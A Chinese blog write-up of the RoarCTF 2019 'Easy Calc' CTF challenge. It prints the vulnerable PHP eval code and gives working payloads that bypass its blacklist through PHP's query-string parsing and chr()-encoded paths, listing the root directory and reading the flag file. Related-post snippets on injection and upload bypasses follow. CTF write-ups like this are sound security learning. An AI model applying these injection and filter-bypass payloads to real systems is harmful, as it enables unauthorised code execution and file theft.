[RoarCTF 2019]Easy Calc

最新推荐文章于 2024-10-30 21:56:10 发布
最新推荐文章于 2024-10-30 21:56:10 发布
阅读量115 收藏
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46607055/article/details/120955276
版权

Ctrl + u 查看 源码

访问 /calc.php

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

 黑名单过滤了 空格、换行、单双引号等特殊符号  。 进一步测试发现 字符串也不能传入。 这部分waf没有写出来。

这里如何传入字符串呢? 利用php字符串的解析漏洞

在num前 加一个空格 就能绕过,及传入?%20num=ls

传入的php命令要配合 echo 输出

var_dump() 函数 (用于输出变量的相关信息)

配合 scandir()  列出指定目录的所有文件,返回数组。

 构造

?%20num=var_dump(scandir("/"))

/被过滤了,所以用ascii码绕过

?%20num=var_dump(scandir(chr(47)))

flag 藏在 f1agg

再用 file_get_contents()函数返回里面的内容。同样,用ASCII码绕过

?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

 得到flag

string(43) "flag{933eccfc-40ba-4df5-b721-fc9af637b26c} "

总结:

1、php字符串解析特性。 get 和 post 传参的内容会被放入一个关联数组。 若关联数组的键,最开头有空格,会被忽略掉。

2、echo 配合 var_dump输出。

3、scandir()扫描输出指定目录的文件,数组形式

m0_46607055
关注
专栏目录
mysql hypot_几道web题简单总结
weixin_42516104的博客
01-27 205
拖了好长时间,总结一下这一段时间做的几道值得记录一下的题目,有的没做出来,但是学习到了新的东西1.homebrew event loopddctf的一道题目,学到了python eval函数的用法,首先分析题目:#-*- encoding: utf-8 -*-#written in python 2.7__author__ = 'garzon'from flask importFlask, ses...
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 3021
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF(web刷题记录一)
nareku的博客
04-16 8921
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
[RoarCTF 2019]Easy Calc 空格加变量绕过waf,字符拼接绕过黑名单
qq_61774705的博客
06-04 241
利用PHP的字符串解析特性Bypass
CTF中一些绕过
qq_41996851的博客
04-23 2545
PHP 主要体现在序列化中; php中的类会有构造函数和析构函数,也还有内置的一些其他语言没有的函数: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; // 构造函数,声明对象时触发 public function __construct($username,$password){
[RoarCTF 2019]Easy Calc 1
snowlyzz的博客
03-13 3649
写给自己看 方便理解。 查看源代码 看到了URL 试试访问calc.php 尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件 那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格 绕过num传参后,我们要读取他根目录下的文件。 也就是 calc.php? num=print_r(scandir('/')); 却发现他没有返回我们想要的答案 抓包看看 发现他把 ' ' 引号给过滤掉了 那就...
[RoarCTF 2019]Easy Calc1
weixin_61021815的博客
05-22 436
进入页面发现是一个计算器 猜测为sql注入(后来一想太过幼稚,他又不和数据库交互) 正在上传…重新上传取消 尝试了一下发现大多数字符都被过滤了 通过看被人的wp,发现可以通过抓包,发现了calc.php 访问一下 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str=$_GET['num']; $blacklist=['...
BUU刷题记录——5
weixin_43610673的博客
09-21 1705
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2348
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
从一道CTF题到HTTP请求走私攻击
蚁景网安学院
11-03 553
01前言 最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。02Roar...
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 624
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语
【BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 2306
【BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
ctfshow web入门 远程命令执行
qq_39948058的博客
10-04 1041
前言:做一下ctfshow web入门远程命令执行题,这里记录下,刚小白也是刚学web方向的题,大佬勿喷。。。 web29 具体分析在代码里: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04...
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 306
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
PHP文件包含漏洞
佛系摆烂
10-29 573
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
Unsafe Fileupload-pikachu
zhangqqa的博客
10-30 990
不安全的文件上传漏洞概述文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。
warmup
最新发布
W286734的博客
10-30 370
查看源代码发现,source.php。访问source.php,显而易见,php代码审计。$pos。
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值